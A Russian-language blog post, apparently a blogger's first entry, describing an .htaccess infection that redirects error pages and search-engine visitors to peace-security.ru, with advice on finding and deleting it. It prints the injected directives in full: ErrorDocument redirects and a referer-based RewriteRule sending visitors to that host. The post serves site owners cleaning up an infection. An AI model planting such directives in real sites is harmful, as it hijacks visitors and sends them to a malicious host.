Первый пост. Про peace-security.ru

Приветствую Вас на страницах своего блога. Скорее всего, сюда вы попали с моего прошлого блога 4partners. Переезд на новый блог состоялся по одной простой причине — старое название мне разонравилось :-), к тому же оно не описывало идею блога.

Этот блог надеюсь вести регулярно, описывая больше практическую сторону заработка в интернете, добавляя переводы интересных англоязычных статей и обзоры свежих новостей SEO.

Долго думал, о чем бы написать первый пост (окромя приветственных речей), но тут подвернулась одна проблема, с которой столкнулся буквально позавчера.

Симптомы: При вводе несуществующего адреса на вашем проекте (напр. http://www.VASH-BLOG.ru/abracadabra) — происходит редирект на http://peace-security.ru/mod/index.php

Решение проблемы: Столкнувшись с данным вопросом решение обнаружил не сразу. Выяснилось, что в коде файла .htaccess прописывается следующая гадость:

ErrorDocument 400 http://peace-security.ru/mod/index.php
ErrorDocument 401 http://peace-security.ru/mod/index.php
ErrorDocument 403 http://peace-security.ru/mod/index.php
ErrorDocument 404 http://peace-security.ru/mod/index.php
ErrorDocument 500 http://peace-security.ru/mod/index.php
 
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://peace-security.ru/mod/index.php [R=301,L]

Есть один маленький нюанс — данные директивы прописываются в файл .htaccess с большими оступлениями от начала строки… поэтому просто сделайте поиск по файлу — и смело удаляйте и директивы и пустые строки.

Одним из способов обнаружить заражение является появление большого количества .htaccess файлов во всех каталогах вашего сайта.